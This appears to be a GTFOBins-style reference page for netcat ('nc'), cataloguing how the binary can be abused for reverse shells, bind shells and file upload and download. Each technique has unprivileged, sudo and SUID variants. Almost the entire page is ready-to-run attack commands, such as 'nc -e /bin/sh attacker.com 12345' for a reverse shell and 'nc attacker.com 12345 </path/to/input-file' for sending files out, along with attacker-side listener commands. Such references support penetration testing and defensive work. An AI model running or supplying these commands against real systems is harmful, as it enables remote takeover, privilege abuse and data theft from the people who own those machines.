.. / nc

Sponsor Fork Star

• Reverse shell
• Bind shell
• Upload
• Download

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

• Comment

  This only works with netcat traditional.

  Unprivileged

  This function can be performed by any unprivileged user.

  nc -e /bin/sh attacker.com 12345

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  nc -e /bin/sh attacker.com 12345

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

  nc -e /bin/sh attacker.com 12345

  TTY

  The spawned shell is just a dummy REPL that can only run simple terminal commands.

  Listener

  A TCP server can be used on the attacker box to receive the shell.

  nc -l -p 12345

Bind shell

This executable can bind a system shell to a local port waiting for an attacker to connect.

• Comment

  This only works with netcat traditional.

  Unprivileged

  This function can be performed by any unprivileged user.

  nc -l -p 12345 -e /bin/sh

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  nc -l -p 12345 -e /bin/sh

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

  nc -l -p 12345 -e /bin/sh

  TTY

  The spawned shell is just a dummy REPL that can only run simple terminal commands.

  Connector

  A TCP client can be used on the attacker box to connect to the shell.

  nc victim.com 12345

Upload

This executable can upload local data.

• Comment

  The file is actually read by the invoking shell.

  Unprivileged

  This function can be performed by any unprivileged user.

  nc -l -p 12345 </path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  nc -l -p 12345 </path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  nc -l -p 12345 </path/to/input-file

  Receiver

  A TCP client can be used on the attacker box to receive the data.

  nc victim.com 12345 >/path/to/output-file

• Comment

  The file is actually read by the invoking shell.

  Unprivileged

  This function can be performed by any unprivileged user.

  nc attacker.com 12345 </path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  nc attacker.com 12345 </path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  nc attacker.com 12345 </path/to/input-file

  Receiver

  A TCP server can be used on the attacker box to receive the data.

  nc -l -p 12345 >/path/to/output-file

Download

This executable can download remote data.

• Comment

  The file is actually written by the invoking shell.

  Unprivileged

  This function can be performed by any unprivileged user.

  nc -l -p 12345 >/path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  nc -l -p 12345 >/path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  nc -l -p 12345 >/path/to/output-file

  Sender

  A TCP client can be used on the attacker box to send the data.

  nc victim.com 12345 </path/to/input-file

• Comment

  The file is actually written by the invoking shell.

  Unprivileged

  This function can be performed by any unprivileged user.

  nc attacker.com 12345 >/path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  nc attacker.com 12345 >/path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  nc attacker.com 12345 >/path/to/output-file

  Sender

  A TCP server can be used on the attacker box to send the data.

  nc -l -p 12345 </path/to/input-file

Source | History